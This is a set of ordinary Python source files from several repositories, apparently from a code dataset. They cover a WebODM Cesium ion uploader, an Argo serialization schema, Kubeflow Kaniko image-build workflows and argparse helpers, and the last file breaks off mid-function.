        key = path.join(file_prefix, ASSET_TO_FILE[asset_type])
        boto3.client(
            "s3",
            endpoint_url=endpoint,
            aws_access_key_id=access_key,
            aws_secret_access_key=secret_key,
            aws_session_token=session_token,
        ).upload_file(asset_path, Bucket=bucket, Key=key, Callback=upload_stats)
        asset_info = upload_stats.asset_info
        asset_info["id"] = ion_id
        asset_info["upload"]["active"] = False
        asset_info["process"]["active"] = True
        set_asset_info(task_id, asset_type, asset_info)

        # On Complete Handler
        asset_logger.info("Upload complete")
        method, url, fields = pluck(on_complete, "method", "url", "fields")
        res = requests.request(method, url=url, headers=headers, data=fields)
        res.raise_for_status()

        # Processing Status Refresh: poll ion until done or errored
        asset_logger.info("Starting processing")
        refresh = True
        while refresh:
            res = requests.get(f"{ION_API_URL}/assets/{ion_id}", headers=headers)
            res.raise_for_status()
            state, percent_complete = pluck(res.json(), "status", "percentComplete")
            progress = float(percent_complete) / 100
            if "ERROR" in state.upper():
                asset_info["error"] = "Processing failed"
                asset_logger.info("Processing failed...")
                refresh = False
            if progress >= 1:
                refresh = False
            # Only persist and log when the reported progress actually moved
            if asset_info["process"]["progress"] != progress:
                asset_info["process"]["progress"] = progress
                asset_logger.info(f"Processing {percent_complete}% - {state}")
                set_asset_info(task_id, asset_type, asset_info)
            time.sleep(2)

        asset_logger.info("Processing complete")
        asset_info["process"]["progress"] = 1
        asset_info["process"]["active"] = False
    except requests.exceptions.HTTPError as e:
        if e.response.status_code == 401:
            asset_info["error"] = "Invalid ion token!"
        elif e.response.status_code == 404:
            asset_info["error"] = "Missing permissions on ion token!"
        else:
            asset_info["error"] = str(e)
        asset_logger.error(e)
    except Exception as e:
        asset_info["error"] = str(e)
        asset_logger.error(e)

    # Clean up the temporary directory produced by to_ion_texture_model
    if del_directory is not None:
        rmtree(del_directory)

    set_asset_info(task_id, asset_type, asset_info)
"repo_name": "OpenDroneMap/WebODM",
"path": "coreplugins/cesiumion/uploader.py",
"copies": "1",
"size": "6717",
"license": "mpl-2.0",
"hash": 6143638130431106000,
"line_mean": 34.3578947368,
"line_max": 92,
"alpha_frac": 0.5681107637,
"autogenerated": false,
"ratio": 4.026978417266187,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5095089180966187,
"avg_score": null,
"num_lines": null
} |
"""Argo schema primitives."""
import sys
import inspect
from . import types
from . import exceptions
# True when running under Python 2 (this module supports both 2 and 3).
PY2 = sys.version_info[0] == 2

# ``string_types`` lets the accessor code below accept both ``str`` and
# ``unicode`` path strings on Python 2, and plain ``str`` on Python 3.
if not PY2:
    string_types = (str,)
else:
    string_types = (str, unicode)
def _get_context(func, kwargs):
"""Prepare a context for the serialization.
:param func: Function which needs or does not need kwargs.
:param kwargs: Dict with context
:return: Keywords arguments that function can accept.
"""
argspec = inspect.getargspec(func)
if argspec.keywords is not None:
return kwargs
return dict((arg, kwargs[arg]) for arg in argspec.args if arg in kwargs)
class Accessor(object):
    """Object that encapsulates the getter and the setter of the attribute."""

    def __init__(self, getter=None, setter=None):
        """Initialize an Accessor object.

        :param getter: Callable or dot-separated attribute path for reading.
        :param setter: Callable or dot-separated attribute path for writing.
        """
        self.getter = getter
        self.setter = setter

    def get(self, obj, **kwargs):
        """Get an attribute from a value.

        :param obj: Object to get the attribute value from.
        :return: Value of object's attribute.
        """
        assert self.getter is not None, "Getter accessor is not specified."
        if callable(self.getter):
            # Pass through only the context keys the getter can accept.
            return self.getter(obj, **_get_context(self.getter, kwargs))

        assert isinstance(self.getter, string_types), "Accessor must be a function or a dot-separated string."
        # Walk the dot-separated path through dicts and object attributes.
        for attr in self.getter.split("."):
            if isinstance(obj, dict):
                obj = obj[attr]
            else:
                obj = getattr(obj, attr)
            # A callable step (e.g. a method) is invoked and ends traversal.
            if callable(obj):
                return obj()
        return obj

    def set(self, obj, value):
        """Set value for obj's attribute.

        :param obj: Result object or dict to assign the attribute to.
        :param value: Value to be assigned.
        """
        assert self.setter is not None, "Setter accessor is not specified."
        if callable(self.setter):
            return self.setter(obj, value)

        assert isinstance(self.setter, string_types), "Accessor must be a function or a dot-separated string."

        def _set(obj, attr, value):
            if isinstance(obj, dict):
                obj[attr] = value
            else:
                setattr(obj, attr, value)
            return value

        # Intermediate containers along the path are always created as fresh
        # dicts before the leaf is assigned.
        path = self.setter.split(".")
        for attr in path[:-1]:
            obj = _set(obj, attr, {})
        _set(obj, path[-1], value)

    def __repr__(self):
        """Accessor representation."""
        # BUG FIX: the setter was previously formatted with index {1},
        # which repeated the getter instead of showing the setter.
        return "<{0} getter='{1}', setter='{2}'>".format(
            self.__class__.__name__,
            self.getter,
            self.setter,
        )
class Attr(object):
    """Schema attribute."""

    def __init__(self, attr_type=None, attr=None, required=True, **kwargs):
        """Attribute constructor.

        :param attr_type: Type, Schema or constant that does the type conversion of the attribute.
        :param attr: Attribute name, dot-separated attribute path or an `Accessor` instance.
        :param required: Is attribute required to be present.
        """
        self.attr = attr
        self.required = required
        self.attr_type = attr_type if attr_type else types.Type()
        # ``default`` is deliberately left unset unless supplied, so that
        # ``hasattr(self, "default")`` distinguishes "no default" from
        # "default=None".
        if "default" in kwargs:
            self.default = kwargs["default"]

    @property
    def compartment(self):
        """The key of the compartment this attribute will be placed into (for example: _links or _embedded)."""
        return None

    @property
    def key(self):
        """The key this attribute will be placed into (within its compartment)."""
        return self.name

    @property
    def accessor(self):
        """Get an attribute's accessor with the getter and the setter.

        :return: `Accessor` instance.
        """
        spec = self.attr
        if isinstance(spec, Accessor):
            return spec
        if callable(spec):
            return Accessor(getter=spec)
        # Fall back to the attribute's own name as the access path.
        path = spec if spec else self.name
        return Accessor(getter=path, setter=path)

    def serialize(self, value, **kwargs):
        """Serialize the attribute of the input data.

        Gets the attribute value with accessor and converts it using the
        type serialization. Schema will place this serialized value into
        corresponding compartment of the HAL structure with the name of the
        attribute as a key.

        :param value: Value to get the attribute value from.
        :return: Serialized attribute value.
        """
        if not types.Type.is_type(self.attr_type):
            # Constant attribute: the "type" itself is the serialized value.
            return self.attr_type

        try:
            extracted = self.accessor.get(value, **kwargs)
        except (AttributeError, KeyError):
            if self.required and not hasattr(self, "default"):
                raise
            extracted = self.default
        context = _get_context(self.attr_type.serialize, kwargs)
        return self.attr_type.serialize(extracted, **context)

    def deserialize(self, value):
        """Deserialize the attribute from a HAL structure.

        Get the value from the HAL structure from the attribute's compartment
        using the attribute's name as a key, convert it using the attribute's
        type. Schema will either return it to parent schema or will assign
        to the output value if specified using the attribute's accessor setter.

        :param value: HAL structure to get the value from.
        :return: Deserialized attribute value.
        :raises: ValidationError.
        """
        source = value
        if self.compartment is not None:
            source = value[self.compartment]
        try:
            raw = source[self.key]
        except KeyError:
            if not hasattr(self, "default"):
                raise
            raw = self.default
        return self.attr_type.deserialize(raw)

    def __repr__(self):
        """Attribute representation."""
        return "<%s '%s'>" % (type(self).__name__, self.name)
class _Schema(types.Type):
    """Type for creating schema."""

    def __new__(cls, **kwargs):
        """Create schema from keyword arguments."""
        # Note: instantiating ``_Schema(...)`` returns a brand-new *class*
        # (not an instance) whose attributes are the keyword arguments.
        schema = type("Schema", (cls, ), {"__doc__": cls.__doc__})
        schema.__class_attrs__ = []
        schema.__attrs__ = []
        for name, attr in kwargs.items():
            # Give the attribute its schema key unless one was set already.
            if not hasattr(attr, "name"):
                attr.name = name
            schema.__class_attrs__.append(attr)
            schema.__attrs__.append(attr)
        return schema

    @classmethod
    def serialize(cls, value, **kwargs):
        # Serialize every attribute into its compartment; attributes that
        # cannot be read from ``value`` are skipped unless required.
        result = {}
        for attr in cls.__attrs__:
            compartment = result
            if attr.compartment is not None:
                compartment = result.setdefault(attr.compartment, {})
            try:
                compartment[attr.key] = attr.serialize(value, **kwargs)
            except (AttributeError, KeyError):
                if attr.required:
                    raise
        return result

    @classmethod
    def deserialize(cls, value, output=None):
        """Deserialize the HAL structure into the output value.

        :param value: Dict of already loaded json which will be deserialized by schema attributes.
        :param output: If present, the output object will be updated instead of returning the deserialized data.

        :returns: Dict of deserialized value for attributes. Where key is name of schema's attribute and value is
            deserialized value from value dict.

        :raises: ValidationError aggregating all per-attribute errors.
        """
        errors = []
        result = {}
        for attr in cls.__attrs__:
            try:
                result[attr.name] = attr.deserialize(value)
            except NotImplementedError:
                # Links don't support deserialization
                continue
            except exceptions.ValidationError as e:
                e.attr = attr.name
                errors.append(e)
            except KeyError:
                # Missing keys are only an error for required attributes.
                if attr.required:
                    e = exceptions.ValidationError("Missing attribute.", attr.name)
                    e.attr = attr.name
                    errors.append(e)
        if errors:
            raise exceptions.ValidationError(errors)

        if output is None:
            return result
        # Assign the deserialized values onto the caller-provided object.
        for attr in cls.__attrs__:
            if attr.name in result:
                attr.accessor.set(output, result[attr.name])
class _SchemaType(type):
def __init__(cls, name, bases, clsattrs):
cls.__class_attrs__ = []
cls.__attrs__ = []
# Collect the attributes and set their names.
for name, value in clsattrs.items():
if isinstance(value, Attr):
delattr(cls, name)
cls.__class_attrs__.append(value)
if not hasattr(value, "name"):
value.name = name
for base in reversed(cls.__mro__):
cls.__attrs__.extend(getattr(base, "__class_attrs__", []))
Schema = _SchemaType("Schema", (_Schema, ), {"__doc__": _Schema.__doc__})
| {
"repo_name": "olegpidsadnyi/argo",
"path": "argo/schema.py",
"copies": "1",
"size": "9015",
"license": "mit",
"hash": 4478417798570499600,
"line_mean": 30.8551236749,
"line_max": 113,
"alpha_frac": 0.5759290072,
"autogenerated": false,
"ratio": 4.564556962025317,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00038274752000042674,
"num_lines": 283
} |
""""Argo Workflow base builder for building OCI image using Kaniko"""
from kubeflow.kubeflow import ci
from kubeflow.testing import argo_build_util
class Builder(ci.workflow_utils.ArgoTestBuilder):
def __init__(self, name=None, namespace=None, bucket=None,
test_target_name=None, **kwargs):
super().__init__(name=name, namespace=namespace, bucket=bucket,
test_target_name=test_target_name, **kwargs)
def build(self, dockerfile, context, destination,
second_dockerfile=None, second_destination=None,
mem_override=None, deadline_override=None):
"""Build the Argo workflow graph"""
workflow = self.build_init_workflow(exit_dag=False)
task_template = self.build_task_template(mem_override, deadline_override)
# Build component OCI image using Kaniko
dockerfile = ("%s/%s") % (self.src_dir, dockerfile)
context = "dir://%s/%s" % (self.src_dir, context)
destination = destination
kaniko_task = self.create_kaniko_task(task_template, dockerfile,
context, destination)
argo_build_util.add_task_to_dag(workflow,
ci.workflow_utils.E2E_DAG_NAME,
kaniko_task, [self.mkdir_task_name])
if second_dockerfile and second_destination:
dockerfile = ("%s/%s") % (self.src_dir, second_dockerfile)
destination = second_destination
second_kaniko_task = self.create_kaniko_task(task_template, dockerfile,
context, destination)
argo_build_util.add_task_to_dag(workflow,
ci.workflow_utils.E2E_DAG_NAME,
second_kaniko_task, [self.mkdir_task_name])
# Set the labels on all templates
workflow = argo_build_util.set_task_template_labels(workflow)
return workflow
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/cd/kaniko_builder.py",
"copies": "1",
"size": "2033",
"license": "apache-2.0",
"hash": 7086189228530367000,
"line_mean": 45.2045454545,
"line_max": 83,
"alpha_frac": 0.581406788,
"autogenerated": false,
"ratio": 4.165983606557377,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0017387313388030749,
"num_lines": 44
} |
""""Argo Workflow for building notebook-server-tensorflow-full OCI images using Kaniko"""
from kubeflow.kubeflow.cd import config, kaniko_builder
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = kaniko_builder.Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build(dockerfile="components/example-notebook-servers/jupyter-tensorflow-full/cpu.Dockerfile",
context="components/example-notebook-servers/jupyter-tensorflow-full/",
destination=config.NOTEBOOK_SERVER_JUPYTER_TENSORFLOW_FULL,
second_dockerfile="components/example-notebook-servers/jupyter-tensorflow-full/cuda.Dockerfile",
second_destination=config.NOTEBOOK_SERVER_JUPYTER_TENSORFLOW_CUDA_FULL,
mem_override="8Gi",
deadline_override=6000)
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/cd/notebook_servers/notebook_server_jupyter_tensorflow_full.py",
"copies": "1",
"size": "1074",
"license": "apache-2.0",
"hash": -5141787884058130000,
"line_mean": 55.5263157895,
"line_max": 121,
"alpha_frac": 0.6638733706,
"autogenerated": false,
"ratio": 4.178988326848249,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5342861697448249,
"avg_score": null,
"num_lines": null
} |
""""Argo Workflow for building notebook-server-tensorflow OCI images using Kaniko"""
from kubeflow.kubeflow.cd import config, kaniko_builder
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = kaniko_builder.Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build(dockerfile="components/example-notebook-servers/jupyter-tensorflow/cpu.Dockerfile",
context="components/example-notebook-servers/jupyter-tensorflow/",
destination=config.NOTEBOOK_SERVER_JUPYTER_TENSORFLOW,
second_dockerfile="components/example-notebook-servers/jupyter-tensorflow/cuda.Dockerfile",
second_destination=config.NOTEBOOK_SERVER_JUPYTER_TENSORFLOW_CUDA,
mem_override="8Gi",
deadline_override=6000)
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/cd/notebook_servers/notebook_server_jupyter_tensorflow.py",
"copies": "1",
"size": "1044",
"license": "apache-2.0",
"hash": -2683801358010652700,
"line_mean": 53.9473684211,
"line_max": 116,
"alpha_frac": 0.6599616858,
"autogenerated": false,
"ratio": 4.261224489795918,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5421186175595918,
"avg_score": null,
"num_lines": null
} |
""""Argo Workflow for building the notebook-server-jupyter-pytorch-full OCI images using Kaniko"""
from kubeflow.kubeflow.cd import config, kaniko_builder
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = kaniko_builder.Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build(dockerfile="components/example-notebook-servers/jupyter-pytorch-full/cpu.Dockerfile",
context="components/example-notebook-servers/jupyter-pytorch-full/",
destination=config.NOTEBOOK_SERVER_JUPYTER_PYTORCH_FULL,
second_dockerfile="components/example-notebook-servers/jupyter-pytorch-full/cuda.Dockerfile",
second_destination=config.NOTEBOOK_SERVER_JUPYTER_PYTORCH_CUDA_FULL,
mem_override="8Gi",
deadline_override=6000)
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/cd/notebook_servers/notebook_server_jupyter_pytorch_full.py",
"copies": "1",
"size": "1068",
"license": "apache-2.0",
"hash": 8213372280398020000,
"line_mean": 55.2105263158,
"line_max": 118,
"alpha_frac": 0.6601123596,
"autogenerated": false,
"ratio": 3.985074626865672,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5145186986465672,
"avg_score": null,
"num_lines": null
} |
""""Argo Workflow for building the notebook-server-jupyter-pytorch OCI images using Kaniko"""
from kubeflow.kubeflow.cd import config, kaniko_builder
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = kaniko_builder.Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build(dockerfile="components/example-notebook-servers/jupyter-pytorch/cpu.Dockerfile",
context="components/example-notebook-servers/jupyter-pytorch/",
destination=config.NOTEBOOK_SERVER_JUPYTER_PYTORCH,
second_dockerfile="components/example-notebook-servers/jupyter-pytorch/cuda.Dockerfile",
second_destination=config.NOTEBOOK_SERVER_JUPYTER_PYTORCH_CUDA,
mem_override="8Gi",
deadline_override=6000)
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/cd/notebook_servers/notebook_server_jupyter_pytorch.py",
"copies": "1",
"size": "1038",
"license": "apache-2.0",
"hash": 5149375695415718000,
"line_mean": 53.6315789474,
"line_max": 113,
"alpha_frac": 0.6560693642,
"autogenerated": false,
"ratio": 4.0546875,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.52107568642,
"avg_score": null,
"num_lines": null
} |
""""Argo Workflow for testing Admission Webhook"""
from kubeflow.kubeflow.ci import workflow_utils
from kubeflow.testing import argo_build_util
class Builder(workflow_utils.ArgoTestBuilder):
def __init__(self, name=None, namespace=None, bucket=None,
test_target_name=None, **kwargs):
super().__init__(name=name, namespace=namespace, bucket=bucket,
test_target_name=test_target_name, **kwargs)
def _kustomize_build_task(self, task_template):
k_build = argo_build_util.deep_copy(task_template)
k_build["name"] = "kustomize-build-test"
k_build["container"]["image"] = "k8s.gcr.io/kustomize/kustomize:v4.1.2"
k_build["container"]["args"] = ["build"]
manifest_dir = ("%s/components/admission-webhook/manifests/"
"overlays/cert-manager/") % self.src_dir
k_build["container"]["workingDir"] = manifest_dir
return k_build
def build(self):
"""Build the Argo workflow graph"""
workflow = self.build_init_workflow(exit_dag=False)
task_template = self.build_task_template()
# build manifests with kustomize
kustomize_build_task = self._kustomize_build_task(task_template)
argo_build_util.add_task_to_dag(workflow, workflow_utils.E2E_DAG_NAME,
kustomize_build_task,
[self.mkdir_task_name])
# Test building Admission Webhook image using Kaniko
dockerfile = ("%s/components/admission-webhook"
"/Dockerfile") % self.src_dir
context = "dir://%s/components/admission-webhook/" % self.src_dir
destination = "admission-webhook-test"
kaniko_task = self.create_kaniko_task(task_template, dockerfile,
context, destination,
no_push=True)
argo_build_util.add_task_to_dag(workflow,
workflow_utils.E2E_DAG_NAME,
kaniko_task, [self.mkdir_task_name])
# Set the labels on all templates
workflow = argo_build_util.set_task_template_labels(workflow)
return workflow
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build()
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/ci/admission_webhook_tests.py",
"copies": "1",
"size": "2612",
"license": "apache-2.0",
"hash": 5358690045490798000,
"line_mean": 40.4603174603,
"line_max": 79,
"alpha_frac": 0.5872894334,
"autogenerated": false,
"ratio": 3.9635811836115327,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 63
} |
""""Argo Workflow for testing notebook-server-base OCI image"""
from kubeflow.kubeflow.ci import workflow_utils
from kubeflow.testing import argo_build_util
class Builder(workflow_utils.ArgoTestBuilder):
def __init__(self, name=None, namespace=None, bucket=None,
test_target_name=None, **kwargs):
super().__init__(name=name, namespace=namespace, bucket=bucket,
test_target_name=test_target_name, **kwargs)
def build(self):
"""Build the Argo workflow graph"""
workflow = self.build_init_workflow(exit_dag=False)
task_template = self.build_task_template()
# Test building notebook-server-base image using Kaniko
dockerfile = ("%s/components/example-notebook-servers"
"/base/Dockerfile") % self.src_dir
context = "dir://%s/components/example-notebook-servers/base/" % self.src_dir
destination = "notebook-server-base-test"
kaniko_task = self.create_kaniko_task(task_template, dockerfile,
context, destination, no_push=True)
argo_build_util.add_task_to_dag(workflow,
workflow_utils.E2E_DAG_NAME,
kaniko_task, [self.mkdir_task_name])
# Set the labels on all templates
workflow = argo_build_util.set_task_template_labels(workflow)
return workflow
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build()
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/ci/notebook_servers/notebook_server_base_tests.py",
"copies": "1",
"size": "1781",
"license": "apache-2.0",
"hash": -5387063644461100000,
"line_mean": 40.4186046512,
"line_max": 85,
"alpha_frac": 0.6153846154,
"autogenerated": false,
"ratio": 4.094252873563218,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5209637488963218,
"avg_score": null,
"num_lines": null
} |
""""Argo Workflow for testing notebook-server-codeserver OCI image"""
from kubeflow.kubeflow.ci import workflow_utils
from kubeflow.testing import argo_build_util
class Builder(workflow_utils.ArgoTestBuilder):
def __init__(self, name=None, namespace=None, bucket=None,
test_target_name=None, **kwargs):
super().__init__(name=name, namespace=namespace, bucket=bucket,
test_target_name=test_target_name, **kwargs)
def build(self):
"""Build the Argo workflow graph"""
workflow = self.build_init_workflow(exit_dag=False)
task_template = self.build_task_template()
# Test building notebook-server-codeserver image using Kaniko
dockerfile = ("%s/components/example-notebook-servers"
"/codeserver/Dockerfile") % self.src_dir
context = "dir://%s/components/example-notebook-servers/codeserver/" % self.src_dir
destination = "notebook-server-codeserver-test"
kaniko_task = self.create_kaniko_task(task_template, dockerfile,
context, destination, no_push=True)
argo_build_util.add_task_to_dag(workflow,
workflow_utils.E2E_DAG_NAME,
kaniko_task, [self.mkdir_task_name])
# Set the labels on all templates
workflow = argo_build_util.set_task_template_labels(workflow)
return workflow
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build()
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/ci/notebook_servers/notebook_server_codeserver_tests.py",
"copies": "1",
"size": "1811",
"license": "apache-2.0",
"hash": -6946698984486942000,
"line_mean": 41.1162790698,
"line_max": 91,
"alpha_frac": 0.6217559359,
"autogenerated": false,
"ratio": 4.115909090909091,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5237665026809091,
"avg_score": null,
"num_lines": null
} |
""""Argo Workflow for testing notebook-server-jupyter-tensorflow OCI images"""
from kubeflow.kubeflow.ci import workflow_utils
from kubeflow.testing import argo_build_util
class Builder(workflow_utils.ArgoTestBuilder):
def __init__(self, name=None, namespace=None, bucket=None,
test_target_name=None, **kwargs):
super().__init__(name=name, namespace=namespace, bucket=bucket,
test_target_name=test_target_name, **kwargs)
def build(self):
"""Build the Argo workflow graph"""
workflow = self.build_init_workflow(exit_dag=False)
task_template = self.build_task_template(mem_override="8Gi", deadline_override=6000)
# Test building notebook-server-jupyter-tensorflow images using Kaniko
dockerfile = ("%s/components/example-notebook-servers"
"/jupyter-tensorflow/cpu.Dockerfile") % self.src_dir
context = "dir://%s/components/example-notebook-servers/jupyter-tensorflow/" % self.src_dir
destination = "notebook-server-jupyter-tensorflow-cpu-test"
kaniko_task = self.create_kaniko_task(task_template, dockerfile,
context, destination, no_push=True)
argo_build_util.add_task_to_dag(workflow,
workflow_utils.E2E_DAG_NAME,
kaniko_task, [self.mkdir_task_name])
dockerfile_cuda = ("%s/components/example-notebook-servers"
"/jupyter-tensorflow/cuda.Dockerfile") % self.src_dir
destination_cuda = "notebook-server-jupyter-tensorflow-cuda-test"
kaniko_task_cuda = self.create_kaniko_task(task_template, dockerfile_cuda,
context, destination_cuda, no_push=True)
argo_build_util.add_task_to_dag(workflow,
workflow_utils.E2E_DAG_NAME,
kaniko_task_cuda, [self.mkdir_task_name])
# Set the labels on all templates
workflow = argo_build_util.set_task_template_labels(workflow)
return workflow
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build()
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/ci/notebook_servers/notebook_server_jupyter_tensorflow_tests.py",
"copies": "1",
"size": "2494",
"license": "apache-2.0",
"hash": 9086592361032856000,
"line_mean": 46.0566037736,
"line_max": 99,
"alpha_frac": 0.6110665597,
"autogenerated": false,
"ratio": 4.042139384116694,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5153205943816693,
"avg_score": null,
"num_lines": null
} |
""""Argo Workflow for testing notebook-server-rstudio-tidyverse OCI image"""
from kubeflow.kubeflow.ci import workflow_utils
from kubeflow.testing import argo_build_util
class Builder(workflow_utils.ArgoTestBuilder):
def __init__(self, name=None, namespace=None, bucket=None,
test_target_name=None, **kwargs):
super().__init__(name=name, namespace=namespace, bucket=bucket,
test_target_name=test_target_name, **kwargs)
def build(self):
"""Build the Argo workflow graph"""
workflow = self.build_init_workflow(exit_dag=False)
task_template = self.build_task_template()
# Test building notebook-server-rstudio-tidyverse image using Kaniko
dockerfile = ("%s/components/example-notebook-servers"
"/rstudio-tidyverse/Dockerfile") % self.src_dir
context = "dir://%s/components/example-notebook-servers/rstudio-tidyverse/" % self.src_dir
destination = "notebook-server-rstudio-tidyverse-test"
kaniko_task = self.create_kaniko_task(task_template, dockerfile,
context, destination, no_push=True)
argo_build_util.add_task_to_dag(workflow,
workflow_utils.E2E_DAG_NAME,
kaniko_task, [self.mkdir_task_name])
# Set the labels on all templates
workflow = argo_build_util.set_task_template_labels(workflow)
return workflow
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build()
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/ci/notebook_servers/notebook_server_rstudio_tidyverse_tests.py",
"copies": "1",
"size": "1846",
"license": "apache-2.0",
"hash": 7821207479933249000,
"line_mean": 41.9302325581,
"line_max": 98,
"alpha_frac": 0.6262188516,
"autogenerated": false,
"ratio": 4.01304347826087,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0005185146988890607,
"num_lines": 43
} |
""""Argo Workflow for testing the notebook-server-jupyter-pytorch OCI images"""
from kubeflow.kubeflow.ci import workflow_utils
from kubeflow.testing import argo_build_util
class Builder(workflow_utils.ArgoTestBuilder):
def __init__(self, name=None, namespace=None, bucket=None,
test_target_name=None, **kwargs):
super().__init__(name=name, namespace=namespace, bucket=bucket,
test_target_name=test_target_name, **kwargs)
def build(self):
"""Build the Argo workflow graph"""
workflow = self.build_init_workflow(exit_dag=False)
task_template = self.build_task_template(mem_override="8Gi")
# Test building notebook-server-jupyter-pytorch images using Kaniko
dockerfile = ("%s/components/example-notebook-servers"
"/jupyter-pytorch/cpu.Dockerfile") % self.src_dir
context = "dir://%s/components/example-notebook-servers/jupyter-pytorch/" % self.src_dir
destination = "notebook-server-jupyter-pytorch-cpu-test"
kaniko_task = self.create_kaniko_task(task_template, dockerfile,
context, destination, no_push=True)
argo_build_util.add_task_to_dag(workflow,
workflow_utils.E2E_DAG_NAME,
kaniko_task, [self.mkdir_task_name])
dockerfile_cuda = ("%s/components/example-notebook-servers"
"/jupyter-pytorch/cuda.Dockerfile") % self.src_dir
destination_cuda = "notebook-server-jupyter-pytorch-cuda-test"
kaniko_task_cuda = self.create_kaniko_task(task_template, dockerfile_cuda,
context, destination_cuda, no_push=True)
argo_build_util.add_task_to_dag(workflow,
workflow_utils.E2E_DAG_NAME,
kaniko_task_cuda, [self.mkdir_task_name])
# Set the labels on all templates
workflow = argo_build_util.set_task_template_labels(workflow)
return workflow
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build()
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/ci/notebook_servers/notebook_server_jupyter_pytorch_tests.py",
"copies": "1",
"size": "2453",
"license": "apache-2.0",
"hash": 7061610781880446000,
"line_mean": 45.2830188679,
"line_max": 96,
"alpha_frac": 0.60578883,
"autogenerated": false,
"ratio": 3.962843295638126,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0015742424699651237,
"num_lines": 53
} |
"""Argparse argument types and extensions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os, six, glob, itertools, argparse
_IMG_EXTS = ('.png', '.jpg', '.bmp', '.jpeg')
class ArgumentParser(argparse.ArgumentParser):
"""Extended argparse.ArgumentParser."""
def set_after_fn(self, after_fn):
def dec(fnc):
def new_fn(*args, **kwargs):
opts = fnc(*args, **kwargs)
return after_fn(self, opts)
return new_fn
self.parse_args = dec(self.parse_args)
def store_and(callable):
"""Stores value and call callable."""
class store_and_action(argparse.Action):
def __call__(self, *args, **kwargs):
callable.__call__(args[2])
setattr(args[1], self.dest, args[2])
return store_and_action
def _normalized_path(path):
"""Convert filepath to its normal form."""
return os.path.abspath(os.path.expanduser(path))
def _iendswith(string, suffix):
"""Check if string ends with suffix."""
return string.lower().endswith(suffix)
def _assert_non_empty(iterable):
"""Assert that next exists and fetch it."""
first_elem = six.next(iterable, None)
assert first_elem is not None, first_elem
return itertools.chain([first_elem], iterable)
def _assert_file_is_good(filename):
"""Assserts that file exists and is readable*."""
if not filename:
return
assert os.path.isfile(filename), filename
assert os.access(filename, os.R_OK), filename
assert os.access(filename, os.W_OK), filename
def _assert_dir_already_exists(dirname):
"""Assserts that dirname exists or create one."""
if not dirname:
return
assert os.path.isdir(dirname), dirname
assert os.access(dirname, os.R_OK), dirname
assert os.access(dirname, os.W_OK), dirname
def _assert_dir_exists(dirname):
"""Assserts that dirname exists or create one."""
if not dirname:
return
if not os.path.exists(dirname):
text = "directory %s doesn't exist, so creating"
